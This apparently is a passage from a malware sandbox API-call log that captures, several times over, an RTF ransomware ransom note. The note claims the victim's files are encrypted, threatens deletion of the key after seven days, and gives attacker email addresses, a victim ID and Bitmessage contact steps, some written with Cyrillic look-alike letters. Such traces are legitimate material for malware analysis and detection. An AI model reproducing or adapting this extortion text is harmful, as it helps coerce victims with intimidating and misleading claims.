ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.677] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.677] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 